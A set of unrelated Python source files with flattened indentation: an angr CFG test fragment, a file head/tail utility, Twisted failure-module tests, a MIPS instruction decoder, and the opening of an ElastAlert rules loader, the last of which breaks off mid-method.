preds_1 = cfg.get_predecessors(plt_entry_1)
nose.tools.assert_equal(len(preds_1), 1)
# Each predecessor must have a call edge and a FakeRet edge
edges_0 = cfg.get_successors_and_jumpkind(preds_0[0], excluding_fakeret=False)
nose.tools.assert_equal(len(edges_0), 2)
jumpkinds = set([ jumpkind for _, jumpkind in edges_0 ])
nose.tools.assert_set_equal(jumpkinds, { 'Ijk_Call', 'Ijk_FakeRet' })
edges_1 = cfg.get_successors_and_jumpkind(preds_1[0], excluding_fakeret=False)
nose.tools.assert_equal(len(edges_1), 2)
jumpkinds = set([ jumpkind for _, jumpkind in edges_1 ])
nose.tools.assert_set_equal(jumpkinds, { 'Ijk_Call', 'Ijk_FakeRet' })
def run_all():
functions = globals()
all_functions = dict(filter((lambda (k, v): k.startswith('test_')), functions.items()))
for f in sorted(all_functions.keys()):
if hasattr(all_functions[f], '__call__'):
print f
all_functions[f]()
if __name__ == "__main__":
logging.getLogger("simuvex.plugins.abstract_memory").setLevel(logging.DEBUG)
logging.getLogger("angr.surveyors.Explorer").setLevel(logging.DEBUG)
#logging.getLogger("simuvex.plugins.symbolic_memory").setLevel(logging.DEBUG)
logging.getLogger("angr.analyses.cfg").setLevel(logging.DEBUG)
# logging.getLogger("s_irsb").setLevel(logging.DEBUG)
# Temporarily disable the warnings of claripy backend
#logging.getLogger("claripy.backends.backend").setLevel(logging.ERROR)
#logging.getLogger("claripy.claripy").setLevel(logging.ERROR)
import sys
if len(sys.argv) > 1:
globals()['test_' + sys.argv[1]]()
else:
run_all()
|
|
"""
This module provides a Python implementation of functionality of the GNU tail command.
"""
import os
class TailError(Exception):
"""Tail exceptions"""
class TailBase:
"""
Operations to extract the beginning or end of a stream
"""
line_terminators = ('\r\n', '\n', '\r')
def __init__(self, initial_position, read_buffer_size=None):
"""
We have to keep track of the current position we are at.
:read_buffer_size: how many items to read ahead when searching for separators;
if not given, read until the end.
"""
self.position_index = initial_position
self.read_size = read_buffer_size
def head(self, number_entries):
"""
Retrieve the first number of entries from the stream
:number_entries: how many items to retrieve
"""
raise NotImplementedError()
def tail(self, number_entries=10):
"""
Retrieve the last number of entries from the stream
:number_entries: how many items to retrieve
"""
raise NotImplementedError()
def seek_line_backwards(self):
"""
Searches backwards from the current position for a line terminator
and seeks to the position of the character immediately after it.
:returns: The position immediately after the line separator, or None if not found.
"""
pos = end_pos = self.current_position()
read_size = self.read_size
if pos > read_size:
pos -= read_size
else:
pos = 0
read_size = end_pos
self.seek(pos)
bytes_read, read_str = self.read(read_size)
if bytes_read and read_str[-1] in self.line_terminators:
# The last character is a line terminator, don't count this one
bytes_read -= 1
if read_str[-2:] == '\r\n' and '\r\n' in self.line_terminators:
# found crlf
bytes_read -= 1
while bytes_read > 0:
# Scan backwards, counting the newlines in the current buffer
i = bytes_read - 1
while i >= 0:
if read_str[i] in self.line_terminators:
self.seek(pos + i + 1)
return self.current_position()
i -= 1
if pos == 0 or pos - self.read_size < 0:
# Not enough lines in the buffer; send the whole file
self.seek(0)
return None
pos -= self.read_size
self.seek(pos)
bytes_read, read_str = self.read(self.read_size)
return None
def seek(self, position):
"""Seek in the underlying data, specalizations to be implemented by derived classes"""
self.position_index = position
def seek_line_forward(self):
"""
Searches forward from the current file position for a line separator
and seeks to the position of the character immediately after it.
:returns: The position immediately after the line separator, or None if not found.
"""
pos = self.current_position()
bytes_read, read_str = self.read(self.read_size)
start = 0
if bytes_read and read_str[0] in self.line_terminators:
# If the first character is a line terminator skip over it
start += 1
while bytes_read > 0:
# Now we scan forwards for line terminators in the current buffer
i = start
while i < bytes_read:
if read_str[i] in self.line_terminators:
self.seek(pos + i + 1)
return self.current_position()
i += 1
pos += self.read_size
self.seek(pos)
bytes_read, read_str = self.read(self.read_size)
return None
def read(self, read_size=None):
"""Read from the stream.
:read_size: number of items to read from the current position onwards; if no parameter
is given, everything from the current position onwards is read.
:returns: A tuple of the length of the data and the data
"""
raise NotImplementedError()
def current_position(self):
"""Return the current index in the stream
"""
return self.position_index
class FileBasedTail(TailBase):
"""Implement tail operations for a file object"""
def __init__(self, filename, read_buffer_size=1024):
"""
:filename: The name of the file to open
:read_buffer_size: How many bytes to read ahead
"""
self.filename = filename
check_file_validity(self.filename)
self.file_obj = open(filename, 'r')
super().__init__(initial_position=0, read_buffer_size=read_buffer_size)
def head(self, lines=10):
"""
Return the top lines of the file.
:lines: maximum number of lines to extract
"""
self.seek(0)
for _ in range(lines):
if not self.seek_line_forward():
break
end_pos = self.current_position()
self.seek(0)
_, data = self.read(end_pos - 1)
if data:
return data.splitlines()
return []
def tail(self, lines=10):
"""
Get the last number of lines from a file
:lines: the number of lines to take from the end of the file
"""
self.seek_to_end()
end_pos = self.current_position()
for _ in range(lines):
if not self.seek_line_backwards():
break
_, data = self.read(end_pos - self.current_position() - 1)
if data:
return data.splitlines()
return []
def seek(self, position, whence=0):
"""
Seek to position relative to place specified by whence
:position: where to move the filepointer to
:whence: which relative position to use, same as Python's file objects.
0 is beginning of file, 1 is the current position, 2 is end of file position.
"""
self.file_obj.seek(position, whence)
self.position_index = self.file_obj.tell()
def seek_to_end(self):
"""Seek to the end of the file"""
self.seek(0, 2)
def read(self, read_size=None):
"""Read the next read_size bytes from the current file position or all of
the rest of the file if not specified.
"""
if read_size:
data = self.file_obj.read(read_size)
else:
data = self.file_obj.read()
return len(data), data
def current_position(self):
"""Return the current position in the file that the file pointer is pointed at"""
self.position_index = self.file_obj.tell()
return self.position_index
def check_file_validity(filename):
"""Check if a file exists is readable and is a vaild file"""
if not os.access(filename, os.F_OK):
raise TailError("File '{}' does not exist".format(filename))
if not os.access(filename, os.R_OK):
raise TailError("File '{}' is not readable".format(filename))
if os.path.isdir(filename):
raise TailError("'{}' is a directory and not a file".format(filename))
|
|
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for failure module.
"""
import sys
import StringIO
import traceback
from twisted.trial import unittest, util
from twisted.python import failure
try:
from twisted.test import raiser
except ImportError:
raiser = None
class BrokenStr(Exception):
def __str__(self):
raise self
def getDivisionFailure():
try:
1/0
except:
f = failure.Failure()
return f
class FailureTestCase(unittest.TestCase):
def testFailAndTrap(self):
"""Trapping a failure."""
try:
raise NotImplementedError('test')
except:
f = failure.Failure()
error = f.trap(SystemExit, RuntimeError)
self.assertEquals(error, RuntimeError)
self.assertEquals(f.type, NotImplementedError)
def test_notTrapped(self):
"""Making sure trap doesn't trap what it shouldn't."""
try:
raise ValueError()
except:
f = failure.Failure()
self.assertRaises(failure.Failure, f.trap, OverflowError)
def testPrinting(self):
out = StringIO.StringIO()
try:
1/0
except:
f = failure.Failure()
f.printDetailedTraceback(out)
f.printBriefTraceback(out)
f.printTraceback(out)
def testExplictPass(self):
e = RuntimeError()
f = failure.Failure(e)
f.trap(RuntimeError)
self.assertEquals(f.value, e)
def _getInnermostFrameLine(self, f):
try:
f.raiseException()
except ZeroDivisionError:
tb = traceback.extract_tb(sys.exc_info()[2])
return tb[-1][-1]
else:
raise Exception(
"f.raiseException() didn't raise ZeroDivisionError!?")
def testRaiseExceptionWithTB(self):
f = getDivisionFailure()
innerline = self._getInnermostFrameLine(f)
self.assertEquals(innerline, '1/0')
def testLackOfTB(self):
f = getDivisionFailure()
f.cleanFailure()
innerline = self._getInnermostFrameLine(f)
self.assertEquals(innerline, '1/0')
testLackOfTB.todo = "the traceback is not preserved, exarkun said he'll try to fix this! god knows how"
_stringException = "bugger off"
def _getStringFailure(self):
try:
raise self._stringException
except:
f = failure.Failure()
return f
def test_raiseStringExceptions(self):
        # String exceptions used to totally break f.raiseException
f = self._getStringFailure()
try:
f.raiseException()
except:
self.assertEquals(sys.exc_info()[0], self._stringException)
else:
raise AssertionError("Should have raised")
test_raiseStringExceptions.suppress = [
util.suppress(message='raising a string exception is deprecated')]
def test_printStringExceptions(self):
"""
L{Failure.printTraceback} should write out stack and exception
information, even for string exceptions.
"""
failure = self._getStringFailure()
output = StringIO.StringIO()
failure.printTraceback(file=output)
lines = output.getvalue().splitlines()
# The last line should be the value of the raised string
self.assertEqual(lines[-1], self._stringException)
test_printStringExceptions.suppress = [
util.suppress(message='raising a string exception is deprecated')]
if sys.version_info[:2] >= (2, 6):
skipMsg = ("String exceptions aren't supported anymore starting "
"Python 2.6")
test_raiseStringExceptions.skip = skipMsg
test_printStringExceptions.skip = skipMsg
def testBrokenStr(self):
"""
Formatting a traceback of a Failure which refers to an object
that has a broken __str__ implementation should not cause
getTraceback to raise an exception.
"""
x = BrokenStr()
try:
str(x)
except:
f = failure.Failure()
self.assertEquals(f.value, x)
try:
f.getTraceback()
except:
self.fail("getTraceback() shouldn't raise an exception")
def testConstructionFails(self):
"""
Creating a Failure with no arguments causes it to try to discover the
current interpreter exception state. If no such state exists, creating
the Failure should raise a synchronous exception.
"""
self.assertRaises(failure.NoCurrentExceptionError, failure.Failure)
def test_getTracebackObject(self):
"""
If the C{Failure} has not been cleaned, then C{getTracebackObject}
should return the traceback object that it was given in the
constructor.
"""
f = getDivisionFailure()
self.assertEqual(f.getTracebackObject(), f.tb)
def test_getTracebackObjectFromClean(self):
"""
If the Failure has been cleaned, then C{getTracebackObject} should
return an object that looks the same to L{traceback.extract_tb}.
"""
f = getDivisionFailure()
expected = traceback.extract_tb(f.getTracebackObject())
f.cleanFailure()
observed = traceback.extract_tb(f.getTracebackObject())
self.assertEqual(expected, observed)
def test_getTracebackObjectWithoutTraceback(self):
"""
L{failure.Failure}s need not be constructed with traceback objects. If
a C{Failure} has no traceback information at all, C{getTracebackObject}
should just return None.
None is a good value, because traceback.extract_tb(None) -> [].
"""
f = failure.Failure(Exception("some error"))
self.assertEqual(f.getTracebackObject(), None)
class FindFailureTests(unittest.TestCase):
"""
Tests for functionality related to L{Failure._findFailure}.
"""
def test_findNoFailureInExceptionHandler(self):
"""
Within an exception handler, _findFailure should return
C{None} in case no Failure is associated with the current
exception.
"""
try:
1/0
except:
self.assertEqual(failure.Failure._findFailure(), None)
else:
self.fail("No exception raised from 1/0!?")
def test_findNoFailure(self):
"""
Outside of an exception handler, _findFailure should return None.
"""
self.assertEqual(sys.exc_info()[-1], None) #environment sanity check
self.assertEqual(failure.Failure._findFailure(), None)
def test_findFailure(self):
"""
Within an exception handler, it should be possible to find the
original Failure that caused the current exception (if it was
caused by raiseException).
"""
f = getDivisionFailure()
f.cleanFailure()
try:
f.raiseException()
except:
self.assertEqual(failure.Failure._findFailure(), f)
else:
self.fail("No exception raised from raiseException!?")
def test_failureConstructionFindsOriginalFailure(self):
"""
When a Failure is constructed in the context of an exception
handler that is handling an exception raised by
raiseException, the new Failure should be chained to that
original Failure.
"""
f = getDivisionFailure()
f.cleanFailure()
try:
f.raiseException()
except:
newF = failure.Failure()
self.assertEqual(f.getTraceback(), newF.getTraceback())
else:
self.fail("No exception raised from raiseException!?")
def test_failureConstructionWithMungedStackSucceeds(self):
"""
Pyrex and Cython are known to insert fake stack frames so as to give
more Python-like tracebacks. These stack frames with empty code objects
should not break extraction of the exception.
"""
try:
raiser.raiseException()
except raiser.RaiserException:
f = failure.Failure()
self.assertTrue(f.check(raiser.RaiserException))
else:
self.fail("No exception raised from extension?!")
if raiser is None:
skipMsg = "raiser extension not available"
test_failureConstructionWithMungedStackSucceeds.skip = skipMsg
class TestFormattableTraceback(unittest.TestCase):
"""
Whitebox tests that show that L{failure._Traceback} constructs objects that
can be used by L{traceback.extract_tb}.
If the objects can be used by L{traceback.extract_tb}, then they can be
formatted using L{traceback.format_tb} and friends.
"""
def test_singleFrame(self):
"""
A C{_Traceback} object constructed with a single frame should be able
to be passed to L{traceback.extract_tb}, and we should get a singleton
list containing a (filename, lineno, methodname, line) tuple.
"""
tb = failure._Traceback([['method', 'filename.py', 123, {}, {}]])
# Note that we don't need to test that extract_tb correctly extracts
# the line's contents. In this case, since filename.py doesn't exist,
# it will just use None.
self.assertEqual(traceback.extract_tb(tb),
[('filename.py', 123, 'method', None)])
def test_manyFrames(self):
"""
A C{_Traceback} object constructed with multiple frames should be able
to be passed to L{traceback.extract_tb}, and we should get a list
containing a tuple for each frame.
"""
tb = failure._Traceback([
['method1', 'filename.py', 123, {}, {}],
['method2', 'filename.py', 235, {}, {}]])
self.assertEqual(traceback.extract_tb(tb),
[('filename.py', 123, 'method1', None),
('filename.py', 235, 'method2', None)])
if sys.version_info[:2] >= (2, 5):
from twisted.test.generator_failure_tests import TwoPointFiveFailureTests
|
|
from enum import Enum
import basicTypes
class MainOp(Enum):
J = 2
JAL = 3
BEQ = 4
BNE = 5
BLEZ = 6
BGTZ = 7
ADDI = 8
ADDIU = 9
SLTI = 10
SLTIU = 11
ANDI = 12
ORI = 13
XORI = 14
LUI = 15
BEQL = 20
BNEL = 21
BLEZL = 22
BGTZL = 23
LB = 32
LH = 33
LWL = 34
LW = 35
LBU = 36
LHU = 37
LWR = 38
SB = 40
SH = 41
SWL = 42
SW = 43
SWR = 46
CACHE = 47
LL = 48
LWC1 = 49
LWC2 = 50
PREF = 51
LDC1 = 53
LDC2 = 54
SC = 56
SWC1 = 57
SWC2 = 58
SDC1 = 61
SDC2 = 62
class RegOp(Enum):
SLL = 0
SRL = 2
SRA = 3
SLLV = 4
SRLV = 6
SRAV = 7
JR = 8
JALR = 9
MOVZ = 10
MOVN = 11
SYSCALL = 12
BREAK = 13
SYNC = 15
MFHI = 16
MTHI = 17
MFLO = 18
MTLO = 19
MULT = 24
MULTU = 25
DIV = 26
DIVU = 27
ADD = 32
ADDU = 33
SUB = 34
SUBU = 35
AND = 36
OR = 37
XOR = 38
NOR = 39
SLT = 42
SLTU = 43
class CopOp(Enum):
MFC = 0
CFC = 2
MTC = 4
CTC = 6
BCF = 10
BCT = 11
BCFL = 12
BCTL = 13
class FloatOp(Enum):
ADD = 0
SUB = 1
MUL = 2
DIV = 3
SQRT = 4
ABS = 5
MOV = 6
NEG = 7
ROUND_W = 12
TRUNC_W = 13
CEIL_W = 14
FLOOR_W = 15
CVT_S = 32
CVT_D = 33
CVT_W = 36
C_F = 48
C_UN = 49
C_EQ = 50
C_UEQ = 51
C_OLT = 52
C_ULT = 53
C_OLE = 54
C_ULE = 55
C_SF = 56
C_NGLE = 57
C_SEQ = 58
C_NGL = 59
C_LT = 60
C_NGE = 61
C_LE = 62
C_NGT = 63
class SpecialOp(Enum):
NOP = 0
BLTZ = 10
BGEZ = 11
BLTZL = 12
BGEZL = 13
class Register(Enum):
R0, AT, V0, V1, A0, A1, A2, A3 = range(8)
T0, T1, T2, T3, T4, T5, T6, T7 = range(8, 16)
S0, S1, S2, S3, S4, S5, S6, S7 = range(16, 24)
T8, T9, K0, K1, GP, SP, S8, RA = range(24, 32)
# I'm deeply, deeply sorry for this. I didn't want to require 3.5 just for "start",
# though I guess I'm requiring 3.4 just for enums
class FloatRegister(Enum):
exec(';'.join(('F%s = %s' % (i,i)) for i in range(32)))
SpecialRegister = Enum('SpecialRegister', 'Compare MultLo MultHi')
class Instruction:
branchOPs = set([MainOp[x] for x in "BEQ BNE BLEZ BGTZ BEQL BNEL BLEZL BGTZL".split()] + [CopOp[x] for x in "BCF BCT BCFL BCTL".split()])
J_format = set([MainOp.J,MainOp.JAL])
I_format = set([CopOp.BCF,CopOp.BCT,CopOp.BCFL,CopOp.BCTL])
D_format = set([RegOp.MFLO, RegOp.MFHI])
R_format = set([RegOp.JALR,RegOp.JR,RegOp.MFHI,RegOp.MTHI,RegOp.MFLO,RegOp.MTLO])
RI_format = set([MainOp.LUI, MainOp.BLEZL,MainOp.BGTZL])
SI_format = set([MainOp.BLEZ, MainOp.BGTZ, SpecialOp.BLTZ,SpecialOp.BGEZ,SpecialOp.BLTZL,SpecialOp.BGEZL])
RR_format = set([RegOp.MULT,RegOp.MULTU,RegOp.DIV,RegOp.DIVU])
RRI_format = set([MainOp[x] for x in "BEQ BNE ADDI ADDIU SLTI SLTIU ANDI ORI XORI BEQL BNEL".split()])
RRS_format = set([RegOp[x] for x in "SLL SRL SRA".split()])
RIR_format = set([MainOp[x] for x in "LB LH LWL LW LBU LHU LWR SB SH SWL SW SWR".split()])
RRR_format = set([RegOp[x] for x in "SLLV SRLV SRAV ADD ADDU SUB SUBU AND OR XOR NOR SLT SLTU".split()])
FIR_format = set([MainOp[x] for x in "LWC1 LWC2 LDC1 LDC2 SWC1 SWC2 SDC1 SDC2".split()])
FF_format = set([FloatOp[x] for x in "SQRT ABS MOV NEG ROUND_W TRUNC_W CEIL_W FLOOR_W CVT_S CVT_D CVT_W".split()])
FsF_format = set([FloatOp[x] for x in "C_EQ C_LT C_LE".split()])
FFF_format = set([FloatOp[x] for x in "ADD SUB MUL DIV".split()])
RF_format = set([CopOp.MFC,CopOp.CFC,CopOp.MTC,CopOp.CTC])
def __init__(self, word):
self.raw = word
#________********________********
op = word >> 26 #111111..........................
rs = (word>>21) & 0x1f #......11111.....................
rt = (word>>16) & 0x1f #...........11111................
rd = (word>>11) & 0x1f #................11111...........
imm = word & 0xffff #................1111111111111111
spec = word & 0x3f #..........................111111
try:
self.opcode = MainOp(op)
except ValueError: #need further specification
if op == 0:
if word == 0:
self.opcode = SpecialOp.NOP
return
else:
self.opcode = RegOp(spec)
elif op == 1:
self.opcode = SpecialOp(rt+10)
self.sourceReg = Register(rs)
self.immediate = imm
return
elif op in [16,17,18]:
self.cop = op - 16
if rs == 16:
if self.cop == 0:
raise Exception("cop 0 mostly unimplemented")
elif self.cop == 1:
self.fmt = basicTypes.single
self.opcode = FloatOp(spec)
else:
raise Exception("cop > 1 unimplemented")
elif rs == 17 and self.cop == 1:
self.fmt = basicTypes.double
self.opcode = FloatOp(spec)
elif rs == 20 and spec == 32:
self.fmt = basicTypes.word
self.opcode = FloatOp(spec)
elif rs == 8:
self.opcode = CopOp(((word>>16) & 0x3)+10)
self.target = imm
else:
self.opcode = CopOp(rs)
self.targetReg = Register(rt)
self.fs = FloatRegister(rd)
else:
raise Exception("op " + str(op) + " unimplemented",hex(word))
if isinstance(self.opcode, FloatOp):
self.ft = FloatRegister(rt)
self.fs = FloatRegister(rd)
self.fd = FloatRegister((word>>6) & 0x1f)
elif self.opcode in [MainOp.J, MainOp.JAL]:
self.target = 4*(word & 0x3ffffff)
elif self.opcode in Instruction.FIR_format:
self.sourceReg = Register(rs)
self.targetReg = FloatRegister(rt)
self.immediate = imm
elif isinstance(self.opcode, MainOp):
self.sourceReg = Register(rs)
self.targetReg = Register(rt)
self.immediate = imm
elif self.opcode in [RegOp.SLL,RegOp.SRL,RegOp.SRA]:
self.targetReg = Register(rt)
self.destReg = Register(rd)
self.shift = (word>>6) & 0x1f
elif isinstance(self.opcode, RegOp) or isinstance(self.opcode, CopOp):
self.sourceReg = Register(rs)
self.targetReg = Register(rt)
self.destReg = Register(rd)
elif isinstance(self.opcode, SpecialOp):
pass
else:
raise Exception(str(self.opcode) + " is uncategorized")
def __repr__(self):
return "Instruction(raw = %r, opcode = %r)" % (self.raw, self.opcode)
def __str__(self):
if self.opcode in Instruction.J_format:
return '%s %#X' % (self.opcode.name, self.target)
if self.opcode in Instruction.D_format:
return '%s %s' % (self.opcode.name, self.destReg.name)
if self.opcode in Instruction.R_format:
return '%s %s' % (self.opcode.name, self.sourceReg.name)
if self.opcode in Instruction.I_format:
return '%s%d %#X' % (self.opcode.name, self.cop, self.target)
if self.opcode in Instruction.RI_format:
return '%s %s, %#x' % (self.opcode.name, self.targetReg.name, self.immediate)
if self.opcode in Instruction.SI_format:
return '%s %s, %#x' % (self.opcode.name, self.sourceReg.name, self.immediate)
if self.opcode in Instruction.RR_format:
return '%s %s, %s' % (self.opcode.name, self.sourceReg.name, self.targetReg.name)
if self.opcode in Instruction.RIR_format:
return '%s %s, %#x (%s)' % (self.opcode.name, self.targetReg.name, self.immediate, self.sourceReg.name)
if self.opcode in Instruction.RRI_format:
return '%s %s, %s, %#x' % (self.opcode.name, self.targetReg.name, self.sourceReg.name, self.immediate)
if self.opcode in Instruction.RRR_format:
return '%s %s, %s, %s' % (self.opcode.name, self.destReg.name, self.sourceReg.name, self.targetReg.name)
if self.opcode in Instruction.RRS_format:
return '%s %s, %s, %#x' % (self.opcode.name, self.destReg.name, self.targetReg.name, self.shift)
if self.opcode in Instruction.FIR_format:
return '%s %s, %#x (%s)' % (self.opcode.name, self.targetReg.name, self.immediate, self.sourceReg.name)
if self.opcode in Instruction.FF_format:
return '%s_%s %s, %s' % (self.opcode.name, self.fmt.name[0].upper(), self.fd.name, self.ft.name)
if self.opcode in Instruction.FsF_format:
return '%s_%s %s, %s' % (self.opcode.name, self.fmt.name[0].upper(), self.fs.name, self.ft.name)
if self.opcode in Instruction.FFF_format:
return '%s_S %s, %s, %s' % (self.opcode.name, self.fd.name, self.fs.name, self.ft.name)
if self.opcode in Instruction.RF_format:
return '%s%d %s, %s' % (self.opcode.name, self.cop, self.targetReg.name, self.fs.name)
return self.opcode.name
def isBranch(instr):
op = instr >> 26
try:
if MainOp(op) in Instruction.branchOPs:
return True
except:
pass
if op == 1:
return ((instr >> 16) & 0x1f) in [0, 1, 2, 3]
else:
return op == 16 and (instr >> 21) & 0x1f == 8
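# A minimal decoding sketch. The raw words are ordinary MIPS encodings chosen
# for illustration: 0x24020001 encodes "addiu $v0, $zero, 1" and 0x1000ffff
# encodes "beq $zero, $zero, -1".
def _example_decode():
    instr = Instruction(0x24020001)   # opcode field 9 -> MainOp.ADDIU (RRI format)
    print(instr)                      # -> "ADDIU V0, R0, 0x1"
    print(isBranch(0x1000ffff))       # opcode field 4 -> MainOp.BEQ, so True
    print(isBranch(0x24020001))       # ADDIU is not a branch, so False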
|
|
# -*- coding: utf-8 -*-
import copy
import datetime
import hashlib
import logging
import os
import sys
import jsonschema
import yaml
import yaml.scanner
from staticconf.loader import yaml_loader
from . import alerts
from . import enhancements
from . import ruletypes
from .opsgenie import OpsGenieAlerter
from .util import dt_to_ts
from .util import dt_to_ts_with_format
from .util import dt_to_unix
from .util import dt_to_unixms
from .util import EAException
from .util import get_module
from .util import ts_to_dt
from .util import ts_to_dt_with_format
from .util import unix_to_dt
from .util import unixms_to_dt
class RulesLoader(object):
# import rule dependency
import_rules = {}
# Required global (config.yaml) configuration options for the loader
required_globals = frozenset([])
# Required local (rule.yaml) configuration options
required_locals = frozenset(['alert', 'type', 'name', 'index'])
# Used to map the names of rules to their classes
rules_mapping = {
'frequency': ruletypes.FrequencyRule,
'any': ruletypes.AnyRule,
'spike': ruletypes.SpikeRule,
'blacklist': ruletypes.BlacklistRule,
'whitelist': ruletypes.WhitelistRule,
'change': ruletypes.ChangeRule,
'flatline': ruletypes.FlatlineRule,
'new_term': ruletypes.NewTermsRule,
'cardinality': ruletypes.CardinalityRule,
'metric_aggregation': ruletypes.MetricAggregationRule,
'percentage_match': ruletypes.PercentageMatchRule,
'spike_aggregation': ruletypes.SpikeMetricAggregationRule,
}
# Used to map names of alerts to their classes
alerts_mapping = {
'email': alerts.EmailAlerter,
'jira': alerts.JiraAlerter,
'opsgenie': OpsGenieAlerter,
'stomp': alerts.StompAlerter,
'debug': alerts.DebugAlerter,
'command': alerts.CommandAlerter,
'sns': alerts.SnsAlerter,
'hipchat': alerts.HipChatAlerter,
'stride': alerts.StrideAlerter,
'ms_teams': alerts.MsTeamsAlerter,
'slack': alerts.SlackAlerter,
'mattermost': alerts.MattermostAlerter,
'pagerduty': alerts.PagerDutyAlerter,
'exotel': alerts.ExotelAlerter,
'twilio': alerts.TwilioAlerter,
'victorops': alerts.VictorOpsAlerter,
'telegram': alerts.TelegramAlerter,
'googlechat': alerts.GoogleChatAlerter,
'gitter': alerts.GitterAlerter,
'servicenow': alerts.ServiceNowAlerter,
'alerta': alerts.AlertaAlerter,
'post': alerts.HTTPPostAlerter,
'hivealerter': alerts.HiveAlerter
}
# A partial ordering of alert types. Relative order will be preserved in the resulting alerts list
# For example, jira goes before email so the ticket # will be added to the resulting email.
alerts_order = {
'jira': 0,
'email': 1
}
base_config = {}
def __init__(self, conf):
# schema for rule yaml
self.rule_schema = jsonschema.Draft7Validator(
yaml.load(open(os.path.join(os.path.dirname(__file__), 'schema.yaml')), Loader=yaml.FullLoader))
self.base_config = copy.deepcopy(conf)
def load(self, conf, args=None):
"""
Discover and load all the rules as defined in the conf and args.
:param dict conf: Configuration dict
:param dict args: Arguments dict
:return: List of rules
:rtype: list
"""
names = []
use_rule = None if args is None else args.rule
# Load each rule configuration file
rules = []
rule_files = self.get_names(conf, use_rule)
for rule_file in rule_files:
try:
rule = self.load_configuration(rule_file, conf, args)
# A rule failed to load, don't try to process it
if not rule:
logging.error('Invalid rule file skipped: %s' % rule_file)
continue
# By setting "is_enabled: False" in rule file, a rule is easily disabled
if 'is_enabled' in rule and not rule['is_enabled']:
continue
if rule['name'] in names:
raise EAException('Duplicate rule named %s' % (rule['name']))
except EAException as e:
raise EAException('Error loading file %s: %s' % (rule_file, e))
rules.append(rule)
names.append(rule['name'])
return rules
def get_names(self, conf, use_rule=None):
"""
        Return a list of rule names that can be passed to `get_yaml` to retrieve their YAML.
:param dict conf: Configuration dict
:param str use_rule: Limit to only specified rule
:return: A list of rule names
:rtype: list
"""
raise NotImplementedError()
def get_hashes(self, conf, use_rule=None):
"""
Discover and get the hashes of all the rules as defined in the conf.
:param dict conf: Configuration
:param str use_rule: Limit to only specified rule
:return: Dict of rule name to hash
:rtype: dict
"""
raise NotImplementedError()
def get_yaml(self, filename):
"""
Get and parse the yaml of the specified rule.
:param str filename: Rule to get the yaml
:return: Rule YAML dict
:rtype: dict
"""
raise NotImplementedError()
def get_import_rule(self, rule):
"""
Retrieve the name of the rule to import.
:param dict rule: Rule dict
        :return: rule name that can be passed to `get_yaml` to retrieve the YAML of the rule
:rtype: str
"""
return rule['import']
def load_configuration(self, filename, conf, args=None):
""" Load a yaml rule file and fill in the relevant fields with objects.
:param str filename: The name of a rule configuration file.
:param dict conf: The global configuration dictionary, used for populating defaults.
:param dict args: Arguments
:return: The rule configuration, a dictionary.
"""
rule = self.load_yaml(filename)
self.load_options(rule, conf, filename, args)
self.load_modules(rule, args)
return rule
def load_yaml(self, filename):
"""
Load the rule including all dependency rules.
:param str filename: Rule to load
:return: Loaded rule dict
:rtype: dict
"""
rule = {
'rule_file': filename,
}
self.import_rules.pop(filename, None) # clear `filename` dependency
while True:
loaded = self.get_yaml(filename)
# Special case for merging filters - if both files specify a filter merge (AND) them
if 'filter' in rule and 'filter' in loaded:
rule['filter'] = loaded['filter'] + rule['filter']
loaded.update(rule)
rule = loaded
if 'import' in rule:
# Find the path of the next file.
import_filename = self.get_import_rule(rule)
# set dependencies
rules = self.import_rules.get(filename, [])
rules.append(import_filename)
self.import_rules[filename] = rules
filename = import_filename
del (rule['import']) # or we could go on forever!
else:
break
return rule
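    # A worked example of the merge above, with hypothetical file names: if
    # child.yaml contains {import: base.yaml, timeframe: {hours: 1}, filter: [F_child]}
    # and base.yaml contains {type: frequency, timeframe: {hours: 4}, filter: [F_base]},
    # the loaded rule is {type: frequency, timeframe: {hours: 1}, filter: [F_base, F_child]}:
    # keys from the importing file win, while the filter lists are concatenated (ANDed).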
def load_options(self, rule, conf, filename, args=None):
""" Converts time objects, sets defaults, and validates some settings.
:param rule: A dictionary of parsed YAML from a rule config file.
:param conf: The global configuration dictionary, used for populating defaults.
:param filename: Name of the rule
:param args: Arguments
"""
self.adjust_deprecated_values(rule)
try:
self.rule_schema.validate(rule)
except jsonschema.ValidationError as e:
raise EAException("Invalid Rule file: %s\n%s" % (filename, e))
try:
# Set all time based parameters
if 'timeframe' in rule:
rule['timeframe'] = datetime.timedelta(**rule['timeframe'])
if 'realert' in rule:
rule['realert'] = datetime.timedelta(**rule['realert'])
else:
if 'aggregation' in rule:
rule['realert'] = datetime.timedelta(minutes=0)
else:
rule['realert'] = datetime.timedelta(minutes=1)
if 'aggregation' in rule and not rule['aggregation'].get('schedule'):
rule['aggregation'] = datetime.timedelta(**rule['aggregation'])
if 'query_delay' in rule:
rule['query_delay'] = datetime.timedelta(**rule['query_delay'])
if 'buffer_time' in rule:
rule['buffer_time'] = datetime.timedelta(**rule['buffer_time'])
if 'run_every' in rule:
rule['run_every'] = datetime.timedelta(**rule['run_every'])
if 'bucket_interval' in rule:
rule['bucket_interval_timedelta'] = datetime.timedelta(**rule['bucket_interval'])
if 'exponential_realert' in rule:
rule['exponential_realert'] = datetime.timedelta(**rule['exponential_realert'])
if 'kibana4_start_timedelta' in rule:
rule['kibana4_start_timedelta'] = datetime.timedelta(**rule['kibana4_start_timedelta'])
if 'kibana4_end_timedelta' in rule:
rule['kibana4_end_timedelta'] = datetime.timedelta(**rule['kibana4_end_timedelta'])
if 'kibana_discover_from_timedelta' in rule:
rule['kibana_discover_from_timedelta'] = datetime.timedelta(**rule['kibana_discover_from_timedelta'])
if 'kibana_discover_to_timedelta' in rule:
rule['kibana_discover_to_timedelta'] = datetime.timedelta(**rule['kibana_discover_to_timedelta'])
except (KeyError, TypeError) as e:
raise EAException('Invalid time format used: %s' % e)
# Set defaults, copy defaults from config.yaml
for key, val in list(self.base_config.items()):
rule.setdefault(key, val)
rule.setdefault('name', os.path.splitext(filename)[0])
rule.setdefault('realert', datetime.timedelta(seconds=0))
rule.setdefault('aggregation', datetime.timedelta(seconds=0))
rule.setdefault('query_delay', datetime.timedelta(seconds=0))
rule.setdefault('timestamp_field', '@timestamp')
rule.setdefault('filter', [])
rule.setdefault('timestamp_type', 'iso')
rule.setdefault('timestamp_format', '%Y-%m-%dT%H:%M:%SZ')
rule.setdefault('_source_enabled', True)
rule.setdefault('use_local_time', True)
rule.setdefault('description', "")
# Set timestamp_type conversion function, used when generating queries and processing hits
rule['timestamp_type'] = rule['timestamp_type'].strip().lower()
